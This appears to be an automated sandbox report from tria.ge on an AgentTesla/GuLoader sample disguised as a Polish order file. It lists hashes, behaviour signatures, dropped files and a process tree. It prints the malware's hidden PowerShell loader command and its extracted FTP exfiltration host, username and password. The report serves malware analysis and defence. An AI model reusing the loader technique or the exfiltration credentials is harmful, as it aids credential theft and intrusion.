Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Zamówieni...66.exe

windows7-x64

10

Zamówieni...66.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    07/12/2023, 07:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Zamówienie.ZD33166.exe

  • Size

    698KB

  • MD5

    16d009c42496db59b33e6723f913d0c9

  • SHA1

    bed0f6cf09e6bc16190e694d493f891732816e8d

  • SHA256

    d6d400c0847a1893dea669a1c8cfee475cafd9439bc50c694eaccbc04211a0e7

  • SHA512

    02853827c4d99c441c1daf2d22d0da23f42115e7da66396dc9794017322502aee37d2573acc9bf0c3ec300db6697b49ffd3568d1a8544c39973c613daa7f64e3

  • SSDEEP

    12288:UwFGHEN1Sn2VNDyu0AP/0wGc/fMz3rzNI3ylgimtdYM3O0V7bby:U5HEN16kh01w3sZlgZtub0V7q

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.omamontaggi.it
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    pass@A12345@

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Zamówienie.ZD33166.exe
    "C:\Users\Admin\AppData\Local\Temp\Zamówienie.ZD33166.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Tiljublingens=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Balletdanserindernes\Exudatory\Falskspillerens.Ill';$Konferenserne=$Tiljublingens.SubString(48125,3);.$Konferenserne($Tiljublingens)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1532
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:540

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    c5a1570c3b773f69397de0b843e1c781

    SHA1

    c6ce2709586af492fe32b91919d00be2ffcb4574

    SHA256

    66e6b721e0ea2fe25d581143f3e958233a7d4ad8c64d51580874653878890008

    SHA512

    a8f8974e9e76baba3eaa825866bf1fa91e05b7ee9a192aa07ec5de9605b6947673ecdae9a3e56783df0ae443b40a30544a12fc35f92b68eb55a7ed9a29e14144

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize

    242B

    MD5

    ee8a161b30040c3ce20f54aa9863151c

    SHA1

    baea9880b7df6a1900ac891a3515a5bcbd1d1276

    SHA256

    87bbc960b91830e72ac56631b99be82960c7f9ec3bd35bf666cd81857d2640dc

    SHA512

    78c114c0f9f095a0d9adfc0261fbbab185ef587d0664d801f4d952f09cfbebd99d02de3b4f7c10d709c860ec0a8e844c1c983eaed75002a364f81ade994fefad

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
    Filesize

    32B

    MD5

    a8ca1db6ae34f5e5c152094f44f92476

    SHA1

    9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

    SHA256

    1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

    SHA512

    e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar6473.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Balletdanserindernes\Exudatory\Falskspillerens.Ill
    Filesize

    47KB

    MD5

    fa2b04b706a4a1a50a3866e1fffb34f7

    SHA1

    0bf99926ab1aff752fd2325d7dadcf68440cda83

    SHA256

    d16797d1615df0383dab78a1e90f594439ae34c0f0cc9083e5883f42585718c5

    SHA512

    58097ca7d6c8145504b41807f2e0aa4b41aa4d5e58943d47455c7e60a5bc4288756503d5a93e3c2c362c5c5aa0c782af3cf30a6a10e206d498eed7e7ae993263

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Balletdanserindernes\Exudatory\Wreathless.You
    Filesize

    301KB

    MD5

    a7d050056af386ff8097a7effd1d9f6f

    SHA1

    008fafc028955c2bdab6508168135e42b1c2d437

    SHA256

    5270d655c8baee63673cce7a5d4c4bd8130d37dcc5a0688d5589913b96cc6d95

    SHA512

    7413802fcf4e35e690adef8718dfad2fc73848a3f5e9ea7bc9636795dce7cba8bf28022d28e9323041e2210a2ab413f48d1a990f2bb7b40bf42602b28788870d

    Download Submit

  • memory/540-186-0x0000000000390000-0x0000000001E52000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/540-201-0x000000006FA20000-0x0000000070A82000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/540-301-0x000000006F200000-0x000000006F8EE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/540-298-0x0000000000390000-0x0000000001E52000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/540-297-0x0000000021270000-0x00000000212B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/540-296-0x000000006F200000-0x000000006F8EE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/540-294-0x000000006FA20000-0x000000006FA60000-memory.dmp

    Filesize

    256KB

    Download

  • memory/540-293-0x0000000000390000-0x0000000001E52000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/540-292-0x000000006FA20000-0x0000000070A82000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/540-187-0x00000000776A0000-0x0000000077849000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/1532-184-0x0000000002640000-0x0000000002680000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1532-178-0x0000000005530000-0x0000000005534000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1532-172-0x0000000002640000-0x0000000002680000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1532-173-0x0000000002640000-0x0000000002680000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1532-174-0x0000000002640000-0x0000000002680000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1532-171-0x0000000073F30000-0x00000000744DB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1532-170-0x0000000073F30000-0x00000000744DB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1532-188-0x0000000006430000-0x0000000007EF2000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/1532-179-0x0000000006430000-0x0000000007EF2000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/1532-185-0x0000000002640000-0x0000000002680000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1532-183-0x0000000077890000-0x0000000077966000-memory.dmp

    Filesize

    856KB

    Download

  • memory/1532-295-0x0000000006430000-0x0000000007EF2000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/1532-182-0x0000000073F30000-0x00000000744DB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1532-181-0x00000000776A0000-0x0000000077849000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/1532-180-0x0000000006430000-0x0000000007EF2000-memory.dmp

    Filesize

    26.8MB

    Download